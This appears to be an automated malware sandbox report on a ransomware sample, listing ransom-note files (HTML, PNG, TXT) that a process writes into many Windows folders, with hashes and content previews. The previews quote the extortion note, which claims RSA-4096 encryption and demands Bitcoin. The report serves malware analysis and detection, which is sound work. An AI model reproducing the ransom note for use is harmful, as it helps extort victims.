                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Templates\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1016280
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZCu
                  MD5:7ACBA25A5B87828C3CDE396FF8FBB1C5
                  SHA1:81124943F3D73A96DD260ACF800641D3B5935A88
                  SHA-256:41D65253CDD27829CB391175573B6FA683E685EC0DF595CFA093706AA0A6924E
                  SHA-512:6B24D2B336B12C7855F7296A5DC36516D3E25E5DDBDEB154E761AD38528C71D39A94B36801B1B1072404A4BA4E8A30D914ECC829495ADDEB6E9A79AE3CB72BF3
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Templates\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31455
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6FEDBC0B5455746EC9C94454F3D43FE5
                  SHA1:56D3C2E4E25E674280ACFC29588D5A486AAEE8FD
                  SHA-256:F6E0F552BA3084A2AA7E7F786216493CFB90C81357AA2F085EC225FE6F2F21B4
                  SHA-512:A7F362AEF672F1EDFE48CC858324563D0D2110E90388F863F90586E6D7694C1DBB80D3651F5577416AAFD429C9BA4362976BBDA9F2CA9010F2D5309F139429C4
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6232e\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6232e\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6232e\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6266a\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6266a\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6266a\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c62d40\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c62d40\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c62d40\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6305d\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6305d\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6305d\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c634e1\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c634e1\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c634e1\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
